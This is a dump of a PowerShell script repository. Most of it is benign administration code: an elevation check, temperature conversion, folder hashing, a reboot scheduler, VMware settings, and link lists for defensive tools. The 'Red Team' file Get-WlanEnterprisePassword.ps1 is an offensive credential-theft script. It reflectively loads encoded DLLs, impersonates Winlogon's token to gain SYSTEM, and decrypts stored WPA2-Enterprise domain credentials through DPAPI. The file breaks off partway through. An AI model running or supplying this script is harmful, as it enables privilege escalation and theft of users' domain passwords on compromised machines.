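├── Am-I-Run-As-Admin.ps1 ├── Blue Team └── README.md ├── Convert-Temperature.ps1 ├── Documents ├── PowerShell Notes for Professionals.pdf └── README.md ├── Get-FolderHash.ps1 ├── Hardware └── README.md ├── Network └── README.md ├── Plan-Reboot-04.ps1 ├── PowerCLI ├── Enable-Copy-Paste-VM.ps1 └── README.md ├── README.md ├── Red Team ├── Get-WlanEnterprisePassword.ps1 └── README.md ├── Security ├── Check-Downgrade-Attacks.ps1 ├── Check-lower-PS-versions.ps1 ├── Convert-SID-To-Username.ps1 ├── Encrypt-String.ps1 ├── List-RDP-logins.ps1 └── README.md ├── SysAdmin ├── Check-Services.ps1 ├── Clean-Menu.ps1 ├── Connect-Shared-Folder.ps1 ├── Cool-Down-and-Sleep.ps1 ├── Download-File.ps1 ├── README.md ├── Run-Process.ps1 └── Uptime.ps1 ├── Test-PendingReboot.ps1 └── TimeTrack-Specific-Software-Openings.ps1
/Am-I-Run-As-Admin.ps1:
--------------------------------------------------------------------------------
<#
.SYNOPSIS
    Stops the script unless it runs in an elevated (administrator) session.
.DESCRIPTION
    Asks the current process token whether it holds the built-in Administrator role
    (Builtin\Administrators, SID S-1-5-32-544). WindowsPrincipal.IsInRole is the
    documented way to do this and takes the token's group attributes into account,
    so a UAC-filtered session of an admin user is reported as not elevated.
    The same effect can be had with the script-level directive:
    #Requires -RunAsAdministrator
.OUTPUTS
    None. When not elevated a hint is written to the host and the script exits
    with status 1.
#>
function CheckIfScriptIsRunAsAdmin {
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)
    $adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator

    if (-not $principal.IsInRole($adminRole)) {
        Write-Host "`n Woops! Please run me as admin." -Fore Yellow
        Write-Host " Left click on file and 'run as administrator'. :-)" -Fore Yellow
        # 'break' is a loop statement; outside a loop its effect depends on the
        # caller's context. Exit explicitly with a non-zero status so schedulers
        # and wrapper scripts can see that the check failed.
        exit 1
    }
}
CheckIfScriptIsRunAsAdmin

--------------------------------------------------------------------------------
/Blue Team/README.md:
--------------------------------------------------------------------------------
# Blue Team - Defensive
- [PowerShell-Hunter](https://github.com/MHaggis/PowerShell-Hunter) - PowerShell tools to help defenders hunt smarter, hunt harder.

## Anti-virus and scanning for malicious files
- [VirusTotal PowerShell Scanner.ps1](https://github.com/cottinghamd/PowershellAdmin/blob/master/VirusTotal%20PowerShell%20Scanner.ps1) - Some Powershell scripts developed during my security consulting work. Hopefully they are useful to you too!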
6 | 7 | ## Decoding and deobfuscating 8 | - [PSDecode](https://github.com/R3MRUM/PSDecode) - PowerShell script for deobfuscating encoded PowerShell scripts. 9 | - [Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation) - PowerShell Obfuscation Detection Framework. 10 | - base64 11 | ````powershell 12 | #!/usr/local/bin/pwsh 13 | $Text = ‘Hemmelig tekst, woop woop’ 14 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) 15 | $EncodedText =[Convert]::ToBase64String($Bytes) 16 | $EncodedText 17 | ```` 18 | 19 | ## Forensics 20 | - [Sparrow](https://github.com/cisagov/Sparrow) - Sparrow.ps1 was created by CISA's Cloud Forensics team to help detect possible compromised accounts and applications in the Azure/m365 environment. 21 | 22 | ## Incident Response 23 | - [Defensive Scripts by TrustedSec](https://github.com/trustedsec/defensive-scripts) - Collections of scripts created by the Trustedsec crew to aid defenders and Incident Response practitioners with their tasks. 24 | - [Fusion](https://github.com/awaescher/Fusion) - A modern alternative to the Microsoft Assembly Binding Log Viewer (FUSLOGVW.exe) 25 | - [Kansa](https://github.com/davehull/Kansa) - A Powershell incident response framework. 26 | - [PersistenceSniper](https://github.com/last-byte/PersistenceSniper) - Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. 
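
## Monitoring
- [EventList](https://www.powershellgallery.com/packages/EventList/2.0.0) - Install-Module -Name EventList
- [DeepBlueCLI](https://github.com/sans-blue-team/DeepBlueCLI) - a PowerShell Module for Threat Hunting via Windows Event Logs -

## Presentations
- [Blue Team Perspectives - The Business of Incident Response](https://digital-forensics.sans.org/summit-archives/Prague_Summit/Blue_Team_Perspectives_David_Kovar.pdf)

--------------------------------------------------------------------------------
/Convert-Temperature.ps1:
--------------------------------------------------------------------------------
#source: https://communary.net/2015/05/23/convert-temperature/

function Convert-Temperature {
    <#
    .SYNOPSIS
        Convert between different units of temperature.
    .DESCRIPTION
        This functions lets you convert between different units of temperature. You choose the
        unit you want to convert from, and the output will include an object with the value
        converted to all supported units. Supported units are 'Celsius', 'Fahrenheit', 'Kelvin',
        'Rankine', 'Delisle', 'Newton', 'Réaumur' and 'Rømer'.
    .EXAMPLE
        Convert-Temperature -Value 35 -From Celsius
    .NOTES
        Author: Øyvind Kallstad
        Date: 10.05.2015
        Version: 1.0
    .LINK
        http://en.wikipedia.org/wiki/Conversion_of_units_of_temperature
    #>
    [CmdletBinding()]
    param (
        # The value you want to convert.
        [Parameter(Position = 0, ValueFromPipeline)]
        [ValidateRange([double]::MinValue,[double]::MaxValue)]
        [double] $Value,

        # The unit you want to convert from. Available units are 'Celsius', 'Fahrenheit', 'Kelvin',
        # 'Rankine', 'Delisle', 'Newton', 'Réaumur' and 'Rømer'.
        [Parameter(Position = 1)]
        [ValidateSet('Celsius','Fahrenheit','Kelvin','Rankine','Delisle','Newton','Réaumur','Rømer')]
        [string] $From,

        # How many decimals you want to include in return values.
        [Parameter()]
        [ValidateRange(0,15)]
        [int] $Decimals = 2
    )

    switch ($From) {
        'Celsius' {
            Write-Output ([PSCustomObject] [Ordered] @{
                Celsius = [math]::Round($Value, $Decimals)
                Fahrenheit = [math]::Round(($Value * (9/5) + 32), $Decimals)
                Kelvin = [math]::Round(($Value + 273.15), $Decimals)
                Rankine = [math]::Round((($Value + 273.15) * (9/5)), $Decimals)
                Delisle = [math]::Round(((100 – $Value) * (3/2)), $Decimals)
                Newton = [math]::Round(($Value * (33/100)), $Decimals)
                Réaumur = [math]::Round(($Value * (4/5)), $Decimals)
                Rømer = [math]::Round(($Value * (21/40) + 7.5), $Decimals)
            });break
        }
        'Fahrenheit' {
            Write-Output ([PSCustomObject] [Ordered] @{
                Celsius = [math]::Round((($Value – 32) * (5/9)), $Decimals)
                Fahrenheit = [math]::Round($Value, $Decimals)
                Kelvin = [math]::Round((($Value + 459.67) * (5/9)), $Decimals)
                Rankine = [math]::Round(($Value + 459.67), $Decimals)
                Delisle = [math]::Round(((212 – $Value) * (5/6)), $Decimals)
                Newton = [math]::Round((($Value – 32) * (11/60)), $Decimals)
                Réaumur = [math]::Round((($Value – 32) * (4/9)), $Decimals)
                Rømer = [math]::Round((($Value – 32) * (7/24) + 7.5), $Decimals)
            });break
        }
        'Kelvin' {
            Write-Output ([PSCustomObject] [Ordered] @{
                Celsius = [math]::Round(($Value – 273.15), $Decimals)
                Fahrenheit = [math]::Round(($Value * (9/5) – 459.67), $Decimals)
                Kelvin = [math]::Round($Value, $Decimals)
                Rankine = [math]::Round(($Value * (9/5)), $Decimals)
                Delisle = [math]::Round(((373.15 – $Value) * (3/2)), $Decimals)
                Newton = [math]::Round((($Value – 273.15) * (33/100)), $Decimals)
                Réaumur = [math]::Round((($Value – 273.15) * (4/5)), $Decimals)
                Rømer = [math]::Round((($Value – 273.15) * (21/40) + 7.5), $Decimals)
            });break
        }
        'Rankine' {
            Write-Output ([PSCustomObject] [Ordered] @{
                Celsius = [math]::Round((($Value – 491.67) * (5/9)), $Decimals)
                Fahrenheit = [math]::Round(($Value – 459.67), $Decimals)
                Kelvin = [math]::Round(($Value * (5/9)), $Decimals)
                Rankine = [math]::Round($Value, $Decimals)
                Delisle = [math]::Round(((671.67 – $Value) * (5/6)), $Decimals)
                Newton = [math]::Round((($Value – 491.67) * (11/60)), $Decimals)
                Réaumur = [math]::Round((($Value – 491.67) * (4/9)), $Decimals)
                Rømer = [math]::Round((($Value – 491.67) * (7/24) + 7.5), $Decimals)
            });break
        }
        'Delisle' {
            Write-Output ([PSCustomObject] [Ordered] @{
                Celsius = [math]::Round((100 – $Value * (2/3)), $Decimals)
                Fahrenheit = [math]::Round((212 – $Value * (6/5)), $Decimals)
                Kelvin = [math]::Round((373.15 – $Value * (2/3)), $Decimals)
                Rankine = [math]::Round((671.67 – $Value * (6/5)), $Decimals)
                Delisle = [math]::Round($Value, $Decimals)
                Newton = [math]::Round((33 – $Value * (11/50)), $Decimals)
                Réaumur = [math]::Round((80 – $Value * (8/15)), $Decimals)
                Rømer = [math]::Round((60 – $Value * (7/20)), $Decimals)
            });break
        }
        'Newton' {
            Write-Output ([PSCustomObject] [Ordered] @{
                Celsius = [math]::Round(($Value * (100/33)), $Decimals)
                Fahrenheit = [math]::Round(($Value * (60/11) + 32), $Decimals)
                Kelvin = [math]::Round(($Value * (100/33) + 273.15), $Decimals)
                Rankine = [math]::Round(($Value * (60/11) + 491.67), $Decimals)
                Delisle = [math]::Round(((33 – $Value) * (50/11)), $Decimals)
                Newton = [math]::Round($Value, $Decimals)
                Réaumur = [math]::Round(($Value * (80/33)), $Decimals)
                Rømer = [math]::Round(($Value * (35/22) + 7.5), $Decimals)
            });break
        }
        'Réaumur' {
            Write-Output ([PSCustomObject] [Ordered] @{
                Celsius = [math]::Round(($Value * (5/4)), $Decimals)
                Fahrenheit = [math]::Round(($Value * (9/4) + 32), $Decimals)
                Kelvin = [math]::Round(($Value * (5/4) + 273.15), $Decimals)
                Rankine = [math]::Round(($Value * (9/4) + 491.67), $Decimals)
                Delisle = [math]::Round(((80 – $Value) * (15/8)), $Decimals)
                Newton = [math]::Round(($Value * (33/80)), $Decimals)
                Réaumur = [math]::Round($Value, $Decimals)
                Rømer = [math]::Round(($Value * (21/32) + 7.5), $Decimals)
            });break
        }
        'Rømer' {
            Write-Output ([PSCustomObject] [Ordered] @{
                Celsius = [math]::Round((($Value – 7.5) * (40/21)), $Decimals)
                Fahrenheit = [math]::Round((($Value – 7.5) * (24/7) + 32), $Decimals)
                Kelvin = [math]::Round((($Value – 7.5) * (40/21) + 273.15), $Decimals)
                Rankine = [math]::Round((($Value – 7.5) * (24/7) + 491.67), $Decimals)
                Delisle = [math]::Round(((60 – $Value) * (20/7)), $Decimals)
                Newton = [math]::Round((($Value – 7.5) * (22/35)), $Decimals)
                Réaumur = [math]::Round((($Value – 7.5) * (32/21)), $Decimals)
                Rømer = [math]::Round($Value, $Decimals)
            });break
        }
    }
}

--------------------------------------------------------------------------------
/Documents/PowerShell Notes for Professionals.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Am0rphous/PowerShell/353397341be4771603ba41336f1c096b1b2d5d76/Documents/PowerShell Notes for Professionals.pdf
--------------------------------------------------------------------------------
/Documents/README.md:
--------------------------------------------------------------------------------
# Documents

--------------------------------------------------------------------------------
/Get-FolderHash.ps1:
--------------------------------------------------------------------------------
<#
.SYNOPSIS
    Prints one SHA-256 digest that covers every file below a folder.
.DESCRIPTION
    Files are visited in a deterministic order (path relative to $folder, ordinal sort)
    and each one contributes its relative path and its content to the hash, both with
    an explicit length prefix (8 bytes, host byte order). The digest therefore does not
    depend on file-system enumeration order, changes when a file is renamed or moved
    inside the tree, and is free of the ambiguity of plain concatenation (where content
    "ab" + name "c" and content "a" + name "bc" would collide). Files are streamed
    through the hasher, so the tree does not have to fit in memory.
    Digests are not comparable with those from earlier versions of this function, which
    concatenated content and bare file names in enumeration order.
.PARAMETER folder
    Root of the tree to hash. Must exist.
.PARAMETER PassThru
    Also emit the lowercase hex digest as a string so it can be captured or compared.
.EXAMPLE
    Get-FolderHash "C:\CustomFolder"
.EXAMPLE
    $before = Get-FolderHash "C:\CustomFolder" -PassThru
#>
Function Get-FolderHash {
    param (
        [Parameter(Mandatory = $true, Position = 0)]
        [string] $folder,

        [switch] $PassThru
    )

    Write-host "`nCalculating hash..." -Fore Yellow

    # Resolve once so every relative path is computed against the same absolute root.
    $root = (Resolve-Path -LiteralPath $folder).ProviderPath.TrimEnd('\', '/')

    # Relative path -> full path. Ordinal (case-sensitive) comparer so two names that
    # differ only by case stay distinct on file systems that allow that.
    $entries = New-Object 'System.Collections.Generic.Dictionary[string,string]' ([System.StringComparer]::Ordinal)
    Get-ChildItem -LiteralPath $root -Recurse -File | ForEach-Object {
        $rel = $_.FullName.Substring($root.Length + 1).Replace('\', '/')
        $entries[$rel] = $_.FullName
    }

    # Ordinal sort: the visiting order, and so the digest, does not depend on the
    # current culture or on the order the file system enumerates entries in.
    $relPaths = @($entries.Keys)
    [array]::Sort($relPaths, [System.StringComparer]::Ordinal)

    $hasher = [System.Security.Cryptography.SHA256]::Create()
    $buffer = New-Object byte[] 65536
    try {
        foreach ($rel in $relPaths) {
            # Length-prefixed relative path (UTF-8, forward slashes).
            $nameBytes = [System.Text.Encoding]::UTF8.GetBytes($rel)
            $lenBytes  = [System.BitConverter]::GetBytes([int64] $nameBytes.Length)
            [void] $hasher.TransformBlock($lenBytes, 0, $lenBytes.Length, $null, 0)
            [void] $hasher.TransformBlock($nameBytes, 0, $nameBytes.Length, $null, 0)

            # Length-prefixed content, streamed in 64 KiB chunks; the stream is always
            # closed, even if a read fails part-way through.
            $stream = [System.IO.File]::OpenRead($entries[$rel])
            try {
                $lenBytes = [System.BitConverter]::GetBytes([int64] $stream.Length)
                [void] $hasher.TransformBlock($lenBytes, 0, $lenBytes.Length, $null, 0)
                while (($read = $stream.Read($buffer, 0, $buffer.Length)) -gt 0) {
                    [void] $hasher.TransformBlock($buffer, 0, $read, $null, 0)
                }
            } finally {
                $stream.Dispose()
            }
        }
        [void] $hasher.TransformFinalBlock(([byte[]] @()), 0, 0)
        $ret = [System.BitConverter]::ToString($hasher.Hash).Replace('-', '').ToLower()
    } finally {
        $hasher.Dispose()
    }

    Write-Host "`nHash of '$folder' is " -Fore Yellow -NoNewline; Write-Host $ret -Fore Green
    if ($PassThru) { $ret }
}

#Syntax: Get-FolderHash "C:\CustomFolder"

--------------------------------------------------------------------------------
/Hardware/README.md:
--------------------------------------------------------------------------------
# Hardware

## Memory
- [Detailed Information about RAM in PowerShell](https://www.digitalbrekke.com/detailed-information-about-ram-in-powershell/)
````powershell
Get-CimInstance -ClassName Win32_PhysicalMemory | Format-Table -Property Manufacturer, @{Name="Model";Expression={$_.PartNumber}}, @{Name="Size";Expression={[math]::round(($_.Capacity/1gb)).ToString()+" GB"}}, @{Name="Clock Speed";Expression={$_.ConfiguredClockSpeed}}, @{Name="RAM Slot";Expression={$_.DeviceLocator}}
````

## Temperature
- [PSTemperature](https://github.com/thedavecarroll/PSTemperature) - PowerShell binary module used for simple conversion of Celsius, Fahrenheit, Kelvin, and Rankine temperatures.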
11 | 12 | ### GPU 13 | ````powershell 14 | wmic /namespace:\\root\cimv2 PATH Win32_PerfFormattedData_Counters_ThermalZoneInformation get Temperature 15 | ```` 16 | Conversion using the Convert-Temperature script in the main folder 17 | ````powershell 18 | Convert-Temperature 303 -from Kelvin | ft 19 | ```` 20 | -------------------------------------------------------------------------------- /Network/README.md: -------------------------------------------------------------------------------- 1 | # Network 2 | 3 | 4 | ## Find best server based on latency 5 | ````powershell 6 | $servers = @( 7 | "us.api.security.microsoft.com", 8 | "eu.api.security.microsoft.com", 9 | "uk.api.security.microsoft.com", 10 | "au.api.security.microsoft.com", 11 | "swa.api.security.microsoft.com", 12 | "ina.api.security.microsoft.com" 13 | ) 14 | 15 | foreach ($server in $servers) { 16 | Write-Host "Pinging $server..." 17 | $pingResult = Test-Connection -ComputerName $server -Count 4 -ErrorAction SilentlyContinue 18 | if ($pingResult) { 19 | $avgResponseTime = ($pingResult | Measure-Object ResponseTime -Average).Average 20 | Write-Host "$server - Average Response Time: $avgResponseTime ms" 21 | } else { 22 | Write-Host "$server - Ping failed" 23 | } 24 | Write-Host "" 25 | } 26 | ```` 27 | Expected results: 28 | ```` 29 | Pinging us.api.security.microsoft.com... 30 | us.api.security.microsoft.com - Average Response Time: 106 ms 31 | 32 | Pinging eu.api.security.microsoft.com... 33 | eu.api.security.microsoft.com - Average Response Time: 24.75 ms 34 | 35 | Pinging uk.api.security.microsoft.com... 36 | uk.api.security.microsoft.com - Average Response Time: 31.75 ms 37 | 38 | Pinging au.api.security.microsoft.com... 39 | au.api.security.microsoft.com - Average Response Time: 255 ms 40 | 41 | Pinging swa.api.security.microsoft.com... 42 | swa.api.security.microsoft.com - Average Response Time: 28.25 ms 43 | 44 | Pinging ina.api.security.microsoft.com... 
45 | ```` 46 | -------------------------------------------------------------------------------- /Plan-Reboot-04.ps1: -------------------------------------------------------------------------------- 1 | 2 | function ErDuHeltSikker? { 3 | do { 4 | [string]$script:valg = Read-Host "`tJ/N" 5 | if ($script:valg -eq "" -or 6 | $script:valg -ne "j" -and 7 | $script:valg -ne "n" 8 | ) { Write-Host "`n`tVennligst velg 'J' for ja eller 'N' for nei`n" -Fore Red } 9 | } while ($script:valg -ne "j" -and $valg -ne "n") 10 | } 11 | 12 | #Funksjon som viser tid etter utf�rte kommandoer 13 | $date = Get-Date -Format yyyy-MM-dd 14 | $time = get-date -Format HH:mm:ss 15 | $datetime = $date + " | " + $time 16 | 17 | $Skrivebordet = [Environment]::GetFolderPath("Desktop") 18 | $MappeSti = [Environment]::GetFolderPath("Desktop") + "\logger" 19 | $FilSti = $MappeSti + "\reboot-logg.txt" 20 | 21 | Clear-Host 22 | 23 | Write-Host "`n======== Planlegging av restart ========" -Fore Cyan 24 | 25 | do { 26 | [string] $navn = Read-Host "`n`tSkriv inn navnet ditt" 27 | if ($navn -eq "") { Write-Host "`n`tFeltet kan ikke v�re tomt" -Fore Red } 28 | } while ($navn -eq "") 29 | 30 | #Sjekker f�rst om loggen IKKE eksisterer 31 | If ((Test-Path $MappeSti) -eq $false) { 32 | 33 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 34 | Write-Host "Fant ikke logg-mappa p� skrivebordet. Pr�ver � opprette mappa.." -Fore Yellow 35 | 36 | New-Item -Path $Skrivebordet -Name "logger" -ItemType "directory" | Out-Null 37 | If ($?) { 38 | Write-Host "$datetime " -NoNewline -Fore Cyan 39 | Write-Host "Oppretta mappa suksessfullt!" -Fore Green 40 | } 41 | } 42 | 43 | If ((Test-Path $FilSti) -eq $false) { 44 | 45 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 46 | Write-Host "Fant ikke logg-fila. Pr�ver � opprette en.." -Fore Yellow 47 | 48 | $BegynnelsesTekst = $datetime + " Tidspunkt for opprettelse av loggfil. 
Utf�rt av '$navn'" 49 | 50 | New-Item -Path $MappeSti -Name "reboot-logg.txt" -ItemType "file" -Value $BegynnelsesTekst | Out-Null 51 | If ($?) { 52 | Write-Host "$datetime " -NoNewline -Fore Cyan 53 | Write-Host "Oppretta loggfil suksessfullt!" -Fore Green 54 | } 55 | } 56 | 57 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 58 | Write-Host "Du har planlagt å utføre en restart av denne serveren klokken 04:00 i morgen." -Fore Yellow 59 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 60 | Write-Host "Bekreft med j/J, eller avbryt med n/N.`n" -Fore Red 61 | ErDuHeltSikker? 62 | 63 | if ($script:valg -eq "j" -or $script:valg -eq "J") { 64 | $melding = "`n$datetime Planlegging av serverrestart klokken 04:00 i morgen, utført av '$navn'." 65 | Add-Content $FilSti $melding 66 | If ($?) { 67 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 68 | Write-Host "Logget planlagt restart av server til fila '$FilSti'" -Fore Green 69 | 70 | #Koden under henter antall sekunder fra nå, til klokken 04 i morgen. 71 | $AntallSekunder = ([decimal]::round(((Get-Date).AddDays(1).Date.AddHours(4) - (Get-Date)).TotalSeconds)) 72 | 73 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 74 | Write-Host "Begynner nedtelling for restart. Det er " -NoNewline -Fore Yellow 75 | Write-Host "$AntallSekunder" -NoNewline -Fore Red 76 | Write-Host " sekunder igjen til restart." -Fore Yellow 77 | 78 | Start-Sleep -Seconds $AntallSekunder 79 | 80 | $sisteMelding = "$datetime Utfører restart nå!" 
81 | Add-Content $FilSti $sisteMelding 82 | 83 | Restart-Computer -Force 84 | } 85 | } Else { 86 | Write-Host "`n$datetime " -NoNewline -Fore Cyan 87 | Write-Host "Avbryter" -Fore Green 88 | } 89 | -------------------------------------------------------------------------------- /PowerCLI/Enable-Copy-Paste-VM.ps1: -------------------------------------------------------------------------------- 1 | 2 | #https://kb.vmware.com/s/article/57122 3 | 4 | # Specify the vCenter server address and login credentials 5 | $vcServer = "server.example.com" 6 | #$username = "admin@vsphere.local" 7 | 8 | # Check if a session already exists for the vCenter server 9 | if (Get-PSSession | Where-Object { $_.ConfigurationName -eq 'VMware.VimAutomation.Core' -and $_.ComputerName -eq $vcServer }) { 10 | Write-Host "Using existing session for vCenter server '$vcServer'" 11 | } else { 12 | # Attempt to connect to the vCenter server 13 | try { 14 | Connect-VIServer -Server $vcServer -Credential(Get-Credential $username) -ErrorAction Stop 15 | Write-Host "Successfully connected to vCenter server '$vcServer'" 16 | } catch { 17 | Write-Error "Error: $($_.Exception.Message)" 18 | Write-Warning "Failed to connect to vCenter server '$vcServer'" 19 | Exit 20 | } 21 | } 22 | 23 | # Specify the name of the virtual machine 24 | do { 25 | $vmName = Read-Host "Enter the name of a virtual machine" 26 | $vm = Get-VM $vmName -ErrorAction SilentlyContinue 27 | if (!$vm) { 28 | Write-Warning "Virtual machine '$vmName' was not found. Did you mean some of these?" 29 | Get-VM | Where-Object {$_.Name -match $vmName} | Select-Object Name 30 | } 31 | } until ($vm) 32 | 33 | # Check if the virtual machine is powered on 34 | if ($vm.PowerState -eq "PoweredOn") { 35 | do { 36 | $answer = Read-Host "The virtual machine is powered on. Do you want to power it off? 
(yes/no)" 37 | $answer = $answer.ToLower() 38 | } until ($answer -eq "yes" -or $answer -eq "y" -or $answer -eq "no" -or $answer -eq "n") 39 | 40 | if ($answer -eq "yes" -or $answer -eq "y") { 41 | Write-Host "Shutting down the virtual machine gracefully..." 42 | Stop-VMGuest $vm -Confirm:$false 43 | do { 44 | Write-Host "Checking if the virtual machine is actually turned off..." 45 | Start-Sleep -Seconds 4 46 | } until ((Get-VM $vmName).PowerState -eq "PoweredOff") 47 | 48 | Write-Host "The virtual machine is now turned off." 49 | } else { 50 | Write-Host "The virtual machine will not be shut down. Fair enough.." 51 | } 52 | } else { 53 | Write-Host "The virtual machine is not powered on." 54 | } 55 | 56 | try { 57 | $vm = Get-VM $vmName 58 | New-AdvancedSetting -Entity $vm -Name isolation.tools.copy.disable -Value "FALSE" -Confirm:$false 59 | New-AdvancedSetting -Entity $vm -Name isolation.tools.paste.disable -Value "FALSE" -Confirm:$false 60 | New-AdvancedSetting -Entity $vm -Name isolation.tools.setGUIOptions.enable -Value "TRUE" -Confirm:$false 61 | Write-Host "Done!" -fore green 62 | } 63 | catch { 64 | Write-Error "Na.. 
something went wrong and here it is: $($_.Exception.Message)" 65 | } 66 | 67 | #Disconnect-VIServer $vcServer -Confirm:$false 68 | -------------------------------------------------------------------------------- /PowerCLI/README.md: -------------------------------------------------------------------------------- 1 | # PowerCLI 2 | 3 | ## Installing PowerShell – Homebrew 4 | ````powershell 5 | /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 6 | brew cask install powershell 7 | pwsh 8 | Install-Module -Name VMware.PowerCLI -Scope CurrentUser 9 | ```` 10 | 11 | ## Connecting to a VCenter Server 12 | - [Connect-VIServer](https://developer.vmware.com/docs/powercli/latest/vmware.vimautomation.core/commands/connect-viserver/#Default) 13 | ````powershell 14 | Connect-VIServer -Server vcenter.mydomain.com #option 1 15 | Connect-VIServer -Server IP-ADDRESS #option 2 16 | ```` 17 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Creativity is your weapon 2 | 3 | _PowerShell is a task automation and configuration management system developed by Microsoft. It is made up of a command language interpreter (shell) and scripting language built on the .NET Framework_ [TecMint](https://www.tecmint.com/install-powershell-in-linux/). 4 | 5 | - [PowerShell](https://github.com/PowerShell/PowerShell) - _"PowerShell for every system!"_ 6 | - [PowerShellGallery.com](https://www.powershellgallery.com) 7 | - [SyStandDeploy.com](http://www.systanddeploy.com) 8 | 9 | Because MacOS and Linux are non-Windows systems, PowerShell might lack some features on these OSes. This is because .NET Core and PowerShell Core are not feature complete on OSes other than Windows. 10 |
11 |
12 | #### When scripting - Keep this in mind 13 | - A script should run without errors 14 | - It should perform the task for which it is intended 15 | - Program logic is clearly defined and apparent 16 | - A script does not do unnecessary work 17 | - Scripts should be reusable 18 | 19 | ## Collections 20 | - [PowerShell-Suite](https://github.com/FuzzySecurity/PowerShell-Suite) - tools and resources. 21 | - [Rvrsh3ll's Misc-PowerShell-Scripts](https://github.com/rvrsh3ll/Misc-Powershell-Scripts) - Random Tools. 22 | 23 | ## Network commands 24 | ````powershell 25 | Test-NetConnection -Computername $target -Port 5985 26 | ```` 27 | 28 | ### Other 29 | - [Nimx](https://github.com/yglukhov/nimx) - Cross-platform GUI framework in Nim. 30 | - [PowerRemoteDesktop](https://github.com/DarkCoderSc/PowerRemoteDesktop) - Remote Desktop entirely coded in PowerShell. 31 | - [Pwsh10k - Oh-my-posh theme](https://github.com/Kudostoy0u/pwsh10k) - Powerlevel10k based theme for Powershell. 32 | 33 | ## TimeTrack-Specific-Software-Openings.ps1 34 | Primitive script used to measure how long a specific program takes to open. VLC and Windows Media Player are used as examples. Modern servers will have a consistent average time, while old and unstable servers will have timing that varies more. Having stable and precise timing is critical in streaming environments, where it is crucial that a program opens without delay. 
35 | 36 | Picture that shows normal timing on modern hardware: 37 | Skjermbilde-2020-07-03-kl-17-07-23 38 | 39 | Timing that shows abnormal timing on slow and old hardware: 40 | Skjermbilde-2020-07-03-kl-17-09-25 41 | -------------------------------------------------------------------------------- /Red Team/Get-WlanEnterprisePassword.ps1: -------------------------------------------------------------------------------- 1 | #Source: https://0x00-0x00.github.io/research/2018/11/06/Recovering-Plaintext-Domain-Credentials-From-WPA2-Enterprise-on-a-compromised-host.html 2 | 3 | function Get-String 4 | { 5 | Param( 6 | [Parameter(Mandatory = $true, Position = 0)] 7 | [byte[]]$InputStream 8 | ) 9 | [byte[]]$Output = @(); 10 | foreach($byte in $InputStream) 11 | { 12 | if($byte -eq 0) 13 | { 14 | return $Output 15 | } else { 16 | $Output += $byte 17 | } 18 | 19 | } 20 | } 21 | 22 | function Get-System 23 | { 24 | if([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') 25 | { 26 | Write-Output "This powershell shell is not in STA mode!"; 27 | return ; 28 | } 29 | 30 | if(-not ([System.Management.Automation.PSTypeName]"zc00l.ImpersonationToken").Type) { 31 | [Reflection.Assembly]::Load([Convert]::FromBase64String("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")) | Out-Null 32 | Write-Verbose "DLL has been reflected." 33 | } 34 | 35 | if(-not [zc00l.ImpersonationToken]::ImpersonateProcessToken((Get-Process Winlogon).Id)) 36 | { 37 | Write-Output "Could not Impersonate Token! Maybe you are not Local Admin?"; 38 | return; 39 | } 40 | } 41 | 42 | function Check-System 43 | { 44 | if([Environment]::Username -eq "SYSTEM") 45 | { 46 | return $true 47 | } 48 | return $false 49 | } 50 | 51 | function Get-WlanEnterprisePassword 52 | { 53 | 54 | if([Environment]::Username -ne "SYSTEM") 55 | { 56 | # Only SYSTEM user can dump the first stage decryption. 57 | Get-System 58 | if(-not (Check-System)) 59 | { 60 | Write-Output "Only SYSTEM can dump DPAPI secrets!" 
61 | return 62 | } 63 | } 64 | 65 | # This DLL contains Windows API RevertToSelf() function 66 | if(-not ([System.Management.Automation.PSTypeName]'Revert').Type) 67 | { 68 | [Reflection.Assembly]::Load([Convert]::FromBase64String("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")) | Out-Null 69 | } 70 | 71 | # This DLL contains Windows DPAPI UnprotectData() function 72 | if(-not ([System.Management.Automation.PSTypeName]'DPAPI').Type) 73 | { 74 | # DPAPI.dll 75 | [Reflection.Assembly]::Load([Convert]::FromBase64String("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")) | Out-Null 76 | } 77 | 78 | # This DLL is code that I have found available in StackOverflow to find locate offsets for specific byte array patterns. 79 | if(-not ([System.Management.Automation.PSTypeName]'Pattern.Search').Type) 80 | { 81 | # PatternSearch.dll 82 | [Reflection.Assembly]::Load([Convert]::FromBase64String("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")) | Out-Null 83 | Write-Verbose "Pattern.Search.dll has been reflected." 84 | } 85 | 86 | $NullReferenceString = "" 87 | $ProtectedFiles = @() 88 | $ProtectedFiles += Get-ProtectedData 89 | if($ProtectedFiles.Length -eq 0) 90 | { 91 | Write-Output "Error: No DPAPI binary data was retrieved." 92 | return 93 | } 94 | Write-Verbose "Harvested $($ProtectedFiles.Length) files." 
